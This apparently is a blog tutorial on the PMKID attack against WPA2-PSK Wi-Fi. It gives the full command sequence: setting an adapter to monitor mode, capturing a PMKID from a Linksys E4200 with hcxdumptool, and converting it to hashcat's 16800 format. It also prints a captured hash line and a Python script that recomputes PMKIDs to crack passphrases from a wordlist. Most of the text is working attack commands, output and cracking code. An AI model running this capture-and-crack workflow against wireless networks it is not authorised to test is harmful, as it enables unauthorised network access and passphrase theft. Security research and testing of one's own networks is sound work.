New attack on WPA/WPA2 using PMKID

In this short post I will walk through obtaining a valid PMKID from an access point and converting the captured frames to hashcat's format for cracking. This is a new way to recover WPA2-PSK passphrases from vulnerable devices: it needs no connected client and no captured 4-way handshake, because the PMKID is sent by the AP itself in the first EAPOL frame it returns after an association request.

Checklist:

Linux (Debian-based; the box used here runs Ubuntu)

# uname -ar

Linux ubuntu 4.13.0-46-generic #51-Ubuntu SMP Tue Jun 12 12:36:29 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Supported adapters (strict)

USB ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter

USB ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter

USB ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter

USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter

USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter

Out of all the cards mentioned, in my preliminary testing I found the older AWUS036H card I bought in 2012 to work the best.

AWUS036H

Both Alfa USB devices work well, but preliminary results show better performance with the AWUS036H: I was able to obtain multiple PMKID frames within seconds from a vulnerable access point. The older Alfa AWUS036H is also a more powerful card and works better in noisier RF conditions.

root@ubuntu:~# lsusb

--- snip ---

Bus 003 Device 016: ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter



--- snip ---

Vulnerable Linksys E4200 router with WPA2-PSK authentication enabled

Seven year old home router from 2011

Wireless Settings

Walk-through:

# ip link set wlx00c0ca59f4b2 down
# iw dev wlx00c0ca59f4b2 set type monitor
# rfkill unblock all
# ip link set wlx00c0ca59f4b2 up
# ./hcxdumptool -i wlx00c0ca694df2 --enable_status -c 6 -o E4200-WPA2PSK.pcapng

[15:18:14 - 006] c0c1c04bfc68 -> e4209b5662d3 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 3605]

[15:18:16 - 006] c0c1c04bfc68 -> fcc2330136c6 [FOUND PMKID]

# ./hcxpcaptool -z E4200-WPA2PSK.16800 E4200-WPA2PSK.pcapng

start reading from E4200-WPA2PSK.pcapng



summary:

--------

file name....................: E4200-WPA2PSK.pcapng

file type....................: pcapng 1.0

file hardware information....: x86_64

file os information..........: Linux 4.13.0-46-generic

file application information.: hcxdumptool 4.2.0

network type.................: DLT_IEEE802_11_RADIO (127)

endianess....................: little endian


read errors..................: flawless

packets inside...............: 129

skipped packets..............: 0

packets with FCS.............: 67

beacons (with ESSID inside)..: 2

probe requests...............: 2

probe responses..............: 4

association requests.........: 13

association responses........: 26

authentications (OPEN SYSTEM): 70

authentications (BROADCOM)...: 14

EAPOL packets................: 12

EAPOL PMKIDs.................: 1

best handshakes..............: 1 (ap-less: 0)

1 PMKID(s) written to E4200-WPA2PSK.16800

# cat E4200-WPA2PSK.16800

b0b606458a7945cf7c80b7fefe390506*c0c1c04bfc68*fcc2330136c6*436973636f3136383934
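That single line is everything hashcat needs. The Python below is an added example, not code from the original post or from the hcx/hashcat projects: it parses the hcxpcaptool 16800 format (PMKID*MAC_AP*MAC_STA*ESSID as hex), derives the PMK with PBKDF2-HMAC-SHA1 over the ESSID (4096 rounds, 32 bytes), recomputes the PMKID as HMAC-SHA1(PMK, "PMK Name" || MAC_AP || MAC_STA) truncated to 16 bytes, and checks candidates the two ways hashcat's PMKID modes do: from a passphrase (WPA-PMKID-PBKDF2) or directly from a 32-byte PMK (WPA-PMKID-PMK). The SSID, MAC addresses and passphrase in the test vector are constructed for the example; the E4200's real passphrase is not on this page, so the captured line is only parsed, not cracked.

```python
# Added example, not code from the original post or from the hcx/hashcat
# projects: what a hashcat 16800 line contains and what a PMKID cracker computes.
#
# hcxpcaptool -z writes one line per PMKID:
#     PMKID*MAC_AP*MAC_STA*ESSID_hex
# with
#     PMK   = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes)  (WPA2-PSK)
#     PMKID = HMAC-SHA1(PMK, "PMK Name" || MAC_AP || MAC_STA)[0:16]
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, Optional


@dataclass(frozen=True)
class PmkidHash:
    pmkid: bytes    # 16 bytes, sent by the AP in the RSN PMKID KDE of EAPOL message 1
    mac_ap: bytes   # 6 bytes, BSSID
    mac_sta: bytes  # 6 bytes, the station that sent the association request
    essid: bytes    # raw SSID bytes (hex-encoded on the line)


def parse_16800(line: str) -> PmkidHash:
    """Split one hcxpcaptool/hashcat 16800 line into its four fields."""
    parts = line.strip().split("*")
    if len(parts) != 4:
        raise ValueError("expected PMKID*MAC_AP*MAC_STA*ESSID")
    h = PmkidHash(*(bytes.fromhex(p) for p in parts))
    if len(h.pmkid) != 16 or len(h.mac_ap) != 6 or len(h.mac_sta) != 6:
        raise ValueError("malformed 16800 line")
    return h


def format_16800(h: PmkidHash) -> str:
    """Inverse of parse_16800."""
    return "*".join(x.hex() for x in (h.pmkid, h.mac_ap, h.mac_sta, h.essid))


def pmk_from_passphrase(passphrase: str, essid: bytes) -> bytes:
    """The expensive step (4096 PBKDF2 rounds); WPA-PMKID-PBKDF2 spends its time here."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def pmkid_from_pmk(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """One HMAC-SHA1 per PMK, truncated to 128 bits; WPA-PMKID-PMK runs only this."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def crack_pbkdf2(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """WPA-PMKID-PBKDF2 style: try each passphrase, return the first that reproduces the PMKID."""
    h = parse_16800(line)
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, h.essid)
        if hmac.compare_digest(pmkid_from_pmk(pmk, h.mac_ap, h.mac_sta), h.pmkid):
            return candidate
    return None


def crack_pmk(line: str, pmk_list: Iterable[bytes]) -> Optional[bytes]:
    """WPA-PMKID-PMK style: candidates are 32-byte PMKs, so no PBKDF2 is needed at all."""
    h = parse_16800(line)
    for pmk in pmk_list:
        if hmac.compare_digest(pmkid_from_pmk(pmk, h.mac_ap, h.mac_sta), h.pmkid):
            return pmk
    return None


# Constructed test vector (assumption): our own SSID, MACs and passphrase, not the E4200's.
TEST_ESSID = b"TestNet"
TEST_MAC_AP = bytes.fromhex("020000000001")
TEST_MAC_STA = bytes.fromhex("020000000002")
TEST_PASSPHRASE = "correct horse battery"
TEST_LINE = format_16800(PmkidHash(
    pmkid_from_pmk(pmk_from_passphrase(TEST_PASSPHRASE, TEST_ESSID), TEST_MAC_AP, TEST_MAC_STA),
    TEST_MAC_AP, TEST_MAC_STA, TEST_ESSID))

if __name__ == "__main__":
    # The line hcxpcaptool wrote for the E4200 above: the ESSID field decodes to Cisco16894.
    captured = "b0b606458a7945cf7c80b7fefe390506*c0c1c04bfc68*fcc2330136c6*436973636f3136383934"
    print(parse_16800(captured).essid.decode())
    print(crack_pbkdf2(TEST_LINE, ["password", "linksys", TEST_PASSPHRASE]))
```

Two things the code makes concrete: the PMKID depends only on the PMK and the two MAC addresses, so the AP leaks a passphrase-derived value to anyone who sends it an association request, with no legitimate client involved; and every candidate costs a full PBKDF2 derivation, which is why the PMK mode exists (a PMK computed once for a given SSID can be checked against any PMKID captured for that SSID with a single HMAC).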

Details to be noted:

Make sure the channel you pass to "-c" is the channel the access point you are targeting is on (6 in the capture above), and that the interface you pass to "-i" is the one you put into monitor mode.

4. Hashcat

Download the newly released hashcat v4.2.0 from https://hashcat.net/hashcat/, which adds two new hash types:

WPA-PMKID-PBKDF2 (-m 16800, candidates are passphrases)

WPA-PMKID-PMK (-m 16801, candidates are 32-byte PMKs)

The files have been copied to a Windows host and "cracked" below for illustration purposes only. Since each hash is a single hex-encoded line, it is much easier to copy and manage between different hosts than a capture file.